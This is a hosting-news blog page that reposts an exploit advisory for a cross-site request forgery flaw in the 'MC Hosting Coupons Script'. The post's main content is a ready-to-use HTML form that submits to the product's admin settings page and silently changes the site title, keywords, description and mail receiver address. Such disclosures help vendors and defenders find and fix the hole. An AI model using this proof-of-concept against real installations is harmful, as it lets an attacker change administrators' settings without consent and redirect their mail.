Popular Posts
-
The chances are you use the services of this company every month – but you might not have heard of Weebly. It is the web-hosting service...
-
Tweet Rackspace Hosting Inc. (NYSE:RAX) – Research analysts at William Blair lifted their Q3 2016 earnin...
-
European leading web hosting provider, HostForLIFE.eu announces support for DotNetNuke 7.4.1 hosting plan due to high demand of DotNetNu...
-
Introduction I am writing this article as a result of my learning for deploying ASP.NET Core web applications on Linux boxes. There is a ...
-
/EINPresswire.com/ -- SANTA FE, NM--(Marketwired - June 04, 2016) - The leading provider of crowdsourced service reviews, CrowdRevie...
-
Managed cloud and hosting company Rackspace today announced that it has sold its Cloud Sites business unit to hosting company Liquid Web. ...
-
MyBroadband will host its annual Cloud and Hosting Conference on 25 May 2016 at the Gallagher Convention Centre in Midrand. Conference...
-
EngageSCV will be hosting a website design workshop on Monday, August 22, to give local entrepreneurs an insight on proper website design....
-
Web Hosting Secret Revealed has gone into detail in their latest publication about what it takes to create, develop and sustain a succe...
-
Web hosting companies in UK rent space on their servers for your website data to be stored on and allow users to access it through the W...
Blog Archive
- December (19)
- November (25)
- October (28)
- September (26)
- August (28)
- July (31)
- June (26)
- May (27)
- April (28)
- March (30)
- February (28)
- January (31)
- December (31)
- November (30)
- October (31)
- September (29)
- August (44)
- July (56)
- June (53)
- May (54)
- April (48)
- March (55)
- February (44)
- January (3)
- December (5)
- November (5)
- October (26)
- September (25)
- August (29)
- July (26)
- June (18)
- September (1)
About Me
Powered by Blogger.
Total Pageviews
Sunday, January 15, 2017
MC Hosting Coupons Script - Cross-Site Request Forgery
# # # # # # Vulnerability: Cross-Site Request Forgery # Date: 15.01.2017 # Vendor Homepage: http://microcode.ws/ # Script Name: MC Hosting Coupons Script # Script Buy Now: http://microcode.ws/product/mc-hosting-coupons-php-script/3881 # Author: İhsan Şencan # Author Web: http://ihsan.net # Mail : ihsan[beygir]ihsan[nokta]net # # # # # # Other features have the same security vulnerability. # Exploit: <html> <body> <form class="form-horizontal" method="post" action="http://localhost/[PATH]/admin/settings.php" id="settings_form"> <label for="website_name" class="control-label col-lg-4">Website Name (Title)</label><br> <input value="MC Hosting Coupons" class="validate[required] form-control" type="text" name="website_name" id="website_name" placeholder="Write website name(title)..." /><br> <label for="website_keywords" class="control-label col-lg-4">Website Keywords</label><br> <input value="hosting, coupons, save money" class="form-control" type="text" name="website_keywords" id="website_keywords" placeholder="Write website keywords..." /><br> <label for="email_receiver_address" class="control-label col-lg-4">Mail Receiver Email Address</label><br> <input value="mail@gmail.com" class="validate[required] form-control" type="text" name="email_receiver_address" id="email_receiver_address" placeholder="Write receiver email address..."><br> <label for="website_desc" class="control-label col-lg-4">Website Description</label><br> <textarea class="form-control" name="website_desc" id="website_desc" placeholder="Write website desc..." ></textarea><br> <input type="submit" name="sub" value="Submit" class="btn btn-primary" /> </form> </body> </html> # # # # #
Source: MC Hosting Coupons Script - Cross-Site Request Forgery
Source: MC Hosting Coupons Script - Cross-Site Request Forgery
Subscribe to:
Post Comments
(Atom)
0 comments:
Post a Comment